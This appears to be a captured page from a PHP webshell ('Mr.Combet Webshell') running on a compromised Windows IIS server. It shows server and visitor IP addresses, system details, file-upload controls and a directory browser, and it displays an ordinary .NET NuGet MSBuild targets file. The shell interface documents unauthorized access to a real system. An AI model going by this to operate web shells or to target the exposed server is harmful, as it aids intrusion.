Mr.Combet Webshell
Your IP :
216.73.216.136
Server IP :
103.233.58.157
Server :
Windows NT WIN-4PGF72KEHKB 10.0 build 17763 (Windows Server 2016) AMD64
Server Software :
Microsoft-IIS/10.0
PHP Version :
7.3.25
Add File :
Submit
Add Directory :
Submit
Dir :
C:
/
Program Files
/
dotnet
/
sdk
/
5.0.405
/
View File Name :
NuGet.RestoreEx.targets
<!-- *********************************************************************************************** NuGet.RestoreEx.targets WARNING: DO NOT MODIFY this file unless you are knowledgeable about MSBuild and have created a backup copy. Incorrect changes to this file will make it impossible to load or build your projects from the command-line or the IDE. Copyright (c) .NET Foundation. All rights reserved. *********************************************************************************************** --> <Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> <UsingTask TaskName="NuGet.Build.Tasks.RestoreTaskEx" AssemblyFile="$(RestoreTaskAssemblyFile)" /> <UsingTask TaskName="NuGet.Build.Tasks.GenerateRestoreGraphFileTask" AssemblyFile="$(RestoreTaskAssemblyFile)" /> <Target Name="Restore"> <!-- Restore using MSBuild's Static Graph Evaluation --> <RestoreTaskEx CleanupAssetsForUnsupportedProjects="$([MSBuild]::ValueOrDefault('$(RestoreCleanupAssetsForUnsupportedProjects)', 'true'))" DisableParallel="$(RestoreDisableParallel)" Force="$(RestoreForce)" ForceEvaluate="$(RestoreForceEvaluate)" HideWarningsAndErrors="$(HideWarningsAndErrors)" IgnoreFailedSources="$(RestoreIgnoreFailedSources)" Interactive="$([MSBuild]::ValueOrDefault('$(NuGetInteractive)', '$(MSBuildInteractive)'))" MSBuildBinPath="$(MSBuildBinPath)" NoCache="$(RestoreNoCache)" ProjectFullPath="$(MSBuildProjectFullPath)" Recursive="$([MSBuild]::ValueOrDefault('$(RestoreRecursive)', 'true'))" RestorePackagesConfig="$(RestorePackagesConfig)" SolutionPath="$(SolutionPath)" ProcessFileName="$(NuGetConsoleProcessFileName)" MSBuildStartupDirectory="$(MSBuildStartupDirectory)" /> </Target> <!-- ============================================================ GenerateRestoreGraphFile Writes the output the dg spec generation by static graph restore. ============================================================ --> <Target Name="GenerateRestoreGraphFile"> <Error Condition="$(RestoreGraphOutputPath) == ''" Text="Missing RestoreGraphOutputPath property!" /> <GenerateRestoreGraphFileTask MSBuildBinPath="$(MSBuildBinPath)" ProjectFullPath="$(MSBuildProjectFullPath)" Recursive="$([MSBuild]::ValueOrDefault('$(RestoreRecursive)', 'true'))" SolutionPath="$(SolutionPath)" RestoreGraphOutputPath="$(RestoreGraphOutputPath)" ProcessFileName="$(NuGetConsoleProcessFileName)" MSBuildStartupDirectory="$(MSBuildStartupDirectory)" /> </Target> </Project>